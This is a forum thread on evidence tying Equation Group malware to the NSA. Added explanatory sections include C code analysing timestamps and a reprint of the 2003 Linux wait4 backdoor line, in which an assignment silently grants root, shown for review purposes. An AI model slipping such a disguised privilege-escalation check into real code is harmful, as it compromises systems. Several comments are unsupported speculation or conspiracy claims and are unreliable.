New Evidence Strengthens NSA Ties To Equation Group Malware
An anonymous reader writes: When researchers from Kaspersky Lab presented the Equation Group espionage malware, many in the security community were convinced it was part of an NSA operation. Now, Kaspersky has released new evidence that only strengthens those suspicions. In a code sample, they found a string named BACKSNARF_AB25, which happens to be the name of a project in the NSA's Tailored Access Operations. Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States. The authors also tended to work Monday through Friday, and not on the weekends, suggesting a large, organized development team. "Whereas before the sprawling Equation Drug platform was known to support 35 different modules, Kaspersky has recently unearthed evidence there are 115 separate plugins. The architecture resembles a mini operating system with kernel- and user-mode components alike."
I am glad our best and brightest are better than their best and brightest... keeping us safe from cyber-terrorism is a huge priority.
Because we believe Putin does not own that company in Moscow or is using it to own anyone running the antivirus tools on their machines. Let's hear it for the Belief and hope system.
Seems like very weak evidence to me, and certainly not a "smoking gun" claimed in the referenced article.
Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States
Um, the US is on UTC -5:00 (ET) through UTC -8:00 (PT). My money is on those pesky Greenlandic uber-hackers.
Hypothetical Scenario: I work as a coder for the NSA, I work with an extremely talented group, we code the latest, most aggressive malware available.
We make the Russians look like Girl Scouts.
How much do you think they pay me?
How much could I make selling the stuff I code at the NSA to various "businesses".
Does anyone in that position believe in nationalism?
"If any question why we died, Tell them because our fathers lied."
Do me a favour. Spooks putting strings identifying their top secret programme by name into malware? Jesus Christ you people are gullible.
If they don't bother to change the timestamps to 03/13/37.
I am becoming gerund, destroyer of verbs.
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Slashdot social media options: AIM, ICQ, Yahoo, Jabber and Mobile Text. Why no MySpace?
Rats hoisted by their own profiling petard.
(-1: Post disagrees with my already-settled worldview) is not a valid mod option.
> Do me a favour. Spooks putting strings identifying their top secret programme by name [...]
The alternative is thrilling too: malware authors knowing the names of top-secret NSA programmes (I assume this malware was hacked together pre-Snowden)? Hmmm.
I don't know the name of the razor to apply here. But it's a hell of a razor, for sure.
Kind of like a PhD student security programmer accidentally putting Heartbleed in in the middle of Xmas, when it was automagically accepted into ssh code, because we do not teach bounds checking to PhD students.
Hope and Belief.
is to brand all timestamps and other traces in the malware, so as to implicate Russia and China, or whatever country or organization happens to be on the agenda.
How many of our own critical systems were offlined by these viruses when they got out in the world?
I mean, people have been struggling with this for years - google "fanny.bmp"
Maybe someone needs to look up just what parts of the world actually use UTC-0300.
Remember the Nimda virus? (That's "admin" backwards.)
Nimda was a polymorphic plague of a virus that hit our network right after 9/11/2001.
It would write itself all over every file on the disk drive until the drive was full and everything came to a screeching halt. It exploited the NT web service that was active by group policy default on client boxes with NT and/or Win 2000. Anyway, our software engineers looked inside the Nimda.dll and there was some jihad "Death to America, Death to Israel" crap commented right into the file!!
I'm sure that was the NSA's earlier work, as they took over most domestic networks just to be on the safe side....
Lots of folks above posting about how the eastern US isn't in TZ UTC-3. If you RTF summary more carefully, they're talking about code timestamps being consistent with 8-5 UTC-3, which is also consistent with 7-4 UTC-4, or 6-3 UTC-5.
The company I work for (UTC-6) routinely has folks coming in as early as 6, with quite a few coming in between 7 and 8, just so they can beat the rush hours. Yes, even coders.
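The ambiguity this post describes can be checked numerically: a block of timestamps spanning nine hours fits an 8-to-5 day at one offset, a 7-to-4 day one hour west, and a 9-to-6 day one hour east. The program below is an added example and is not from the thread, from the Ars article or from Kaspersky's analysis; it uses a constructed set of modification timestamps (Mon-Fri, UTC 12:30 to 20:30, which is what a team working 08:00-17:00 in UTC-4 would produce) and scores each candidate offset against several workday windows.

```c
#include <stddef.h>
#include <stdio.h>
#include <time.h>

/* Constructed sample base: 2015-03-09 00:00:00 UTC, a Monday (epoch seconds). */
#define BASE_MONDAY_UTC 1425859200L
#define SECS_PER_HOUR 3600L
#define SECS_PER_DAY 86400L

/* Build constructed file-modification timestamps: Mon-Fri, one per hour at
 * :30 past, UTC 12:30 through 20:30. A team working 08:00-17:00 in UTC-4
 * would produce exactly this pattern. Returns the number written. */
size_t build_sample(time_t *out, size_t cap) {
    size_t n = 0;
    for (int day = 0; day < 5; day++) {
        for (int utc_hour = 12; utc_hour <= 20; utc_hour++) {
            if (n >= cap) return n;
            out[n++] = BASE_MONDAY_UTC + day * SECS_PER_DAY
                       + utc_hour * SECS_PER_HOUR + 30 * 60;
        }
    }
    return n;
}

/* Broken-down local time for a fixed UTC offset (no DST handling). */
static struct tm to_local(time_t t, int offset_hours) {
    time_t shifted = t + (time_t)offset_hours * SECS_PER_HOUR;
    return *gmtime(&shifted);
}

/* Fraction of timestamps falling Mon-Fri within [start_hour, end_hour)
 * local time at the given offset. 1.0 means every sample fits. */
double workday_fit(const time_t *ts, size_t n, int offset_hours,
                   int start_hour, int end_hour) {
    if (n == 0) return 0.0;
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        struct tm lt = to_local(ts[i], offset_hours);
        int weekday = lt.tm_wday >= 1 && lt.tm_wday <= 5;
        int in_hours = lt.tm_hour >= start_hour && lt.tm_hour < end_hour;
        if (weekday && in_hours) hits++;
    }
    return (double)hits / (double)n;
}

/* Earliest and latest local hour observed at the given offset. */
void hour_span(const time_t *ts, size_t n, int offset_hours,
               int *min_hour, int *max_hour) {
    *min_hour = 24;
    *max_hour = -1;
    for (size_t i = 0; i < n; i++) {
        int h = to_local(ts[i], offset_hours).tm_hour;
        if (h < *min_hour) *min_hour = h;
        if (h > *max_hour) *max_hour = h;
    }
}

int main(void) {
    time_t ts[64];
    size_t n = build_sample(ts, 64);
    printf("offset  span   fit(8-17)  fit(7-16)  fit(9-18)\n");
    for (int off = -8; off <= 0; off++) {
        int lo, hi;
        hour_span(ts, n, off, &lo, &hi);
        printf("UTC%+d  %02d-%02d  %.2f       %.2f       %.2f\n", off, lo, hi,
               workday_fit(ts, n, off, 8, 17),
               workday_fit(ts, n, off, 7, 16),
               workday_fit(ts, n, off, 9, 18));
    }
    return 0;
}
```

Run as-is, the table shows a perfect 8-17 fit at UTC-4, a perfect 7-16 fit at UTC-5 and a perfect 9-18 fit at UTC-3: the timestamps fix the width of the working window, not its start hour, so the offset estimate is only as good as the assumed start time. Real data would also need DST handling and a check of the weekend gap.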
If you remember when some agent broke into a Linux source repository and added a disguised backdoor attack?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
Effectively letting them get root, if they passed those flags into the wait4 call.
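The posted line is worth seeing beside the comparison it imitates, because the two differ by a single character and behave in opposite ways. The following is an added example, not code from the thread or from the kernel: it uses constructed flag values and a stand-in task struct, and models only the condition, not the rest of wait4.

```c
#include <stddef.h>

/* Constructed stand-ins for the flag values and the task structure. */
#define OPT_WCLONE 0x80000000u
#define OPT_WALL   0x40000000u
#define ERR_INVAL  22

struct task { unsigned int uid; };

/* The 2003 line as posted. '=' assigns 0 to uid and the expression then
 * evaluates to 0, so the -EINVAL branch is never taken; the only effect of
 * passing both flags together is that uid becomes 0 (root). The extra
 * parentheses around the assignment also silence gcc's -Wparentheses
 * "assignment used as truth value" warning. */
int check_options_buggy(unsigned int options, struct task *cur) {
    int retval = 0;
    if ((options == (OPT_WCLONE | OPT_WALL)) && (cur->uid = 0))
        retval = -ERR_INVAL;
    return retval;
}

/* What the line pretended to be: a read-only validity check that rejects
 * the flag pair for root and never modifies uid. */
int check_options_fixed(unsigned int options, struct task *cur) {
    int retval = 0;
    if ((options == (OPT_WCLONE | OPT_WALL)) && (cur->uid == 0))
        retval = -ERR_INVAL;
    return retval;
}
```

Reading the two side by side also explains why the change looked innocuous in review: it is shaped like a permission check, returns the usual error code, and touches a code path nobody passes both flags to by accident. A review rule that flags any assignment inside a condition, regardless of parentheses, catches it mechanically.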
It includes the name of the program, as known from the Snowden documents, so it's a SIGNED CONFESSION.
Our NSA had damn well better be better than Putin's and Li Keqiang's, or all of us in the US are going to be irretrievably harmed.
1. Fake the time stamps to look like eastern US
2. Add a well known NSA project name to the code
3. "Leak" information about these issues.
4. Profit
Could this information be a plant to point the finger at the NSA?
So what are you saying there? That we're the Nazi enemy now to be spied on like in the second world war?
Looking through the project names, I suspect the FREE* ones are all open source related. FOX* are maybe firefox attacks?
EFFABLELAMBDA, EFF? DARK* could be darknet attacks.
There's a much more in-depth discussion about EquationGroup malware here:
http://www.wikileaks-forum.com/nsa/332/how-omnipotent-hackers-tied-to-nsa-hid-for-14-yearsand-were-found-at-last/33191/
Kaspersky Lab managed to register some of the attack domains as they expired and collect the data from old attacks. These domains are registered with US-based Domains By Proxy, LLC. So if it was NOT official they should be easy to catch simply because they bought and paid for and renewed the attack domains used!
e.g. standardsandpraiserepurpose[.]com was one of the attack domains and is registered with Domains By Proxy
I emailed Kaspersky asking if they were going to do something about this -- no answer. Seagate tech support continues to pretend it's a non-problem.
We are so screwed.
If every OS and system on the planet is merely your plaything, you are now not just a government agency but a standalone entity that can completely self-fund without leaving a trace, and thus answerable to no one, most especially mere elected civilians.
And if the Senators or POTUS get uppity, well, no one that achieves those offices is innocent, thus they are completely blackmailable, if not subject to out-and-out threats (especially their families).
I think this is the main reason every man that now becomes President ends up with gray hair, regardless of their age.
https://www.youtube.com/watch?v=MGQaH3-LK54
Wasn't the US government condemning the hack of Sony pictures and instituting economic sanctions based on some shaky evidence that North Korea was involved? I wonder what actions the 42 plus countries that have been infected with Equation Group malware should take against the US government.
Sorry guys, I will never use the word "hacker" again now that they are officially called "Exploit Engineers".
Nae king! Nae laird! Nae yurrupiean pressedent! We willna be fooled again!
From the article: "Assuming they worked a regular 8 to 5 workday, the timestamps show the employees were likely in the UTC-3 or UTC-4 time zone, a finding that would be consistent with people working in the Eastern part of the US."
Neither UTC -03:00 nor UTC -04:00 are associated with the Eastern US.
UTC -03:00 is associated with: Buenos Aires, Montevideo, São Paulo
UTC -04:00 is associated with: Santiago, La Paz, San Juan de Puerto Rico, Manaus, Halifax
UTC -05:00, however, is associated with the Eastern US.
Yes, timestamps could be altered.
And, the existence of a particular keyword does not imply NSA ties. It implies that somebody typed a known NSA keyword into the file.
I think Kaspersky likes to read about his brilliance in the pubs. Where's the selfie?
Back in my day, we only had an extra day of the week, not a whole month. You younguns are getting too greedy.
If I'm good enough to write a sophisticated and successful piece of malware, maybe I could change the time stamps and plant some not-so-secret codeword in order to trick people into thinking it was created by my adversary. ("False flag.")
OpenSSL not SSH.
For a largish project I would suspect that the release builds are run over night, CI builds during the work day.
I am very small, utmostly microscopic.
They do. The codewords are often randomly generated and deliberately meaningless. (The word list isn't 100% random, at least since Churchill decided he didn't want anyone to die over something called Operation Bunnyhug back in WW2.)
NSA's mistake was in assuming that the codewords would never leave the organization. Security by obscurity. Replacing codewords with 32-bit hex digits doesn't eliminate that risk.
Fucking NSA wants to see everything and every machine plugged into the Internet to be automatically compromised. Why are we paying our government to do this? They aren't at all concerned with making the net safer, they are concerned with taking it over. Fuck NSA.
Are they so lame and stuffy that they would not cover their butts?
Kaspersky is a KGB front, an incredibly complex operation with built-in denial, run by a pretend dissident.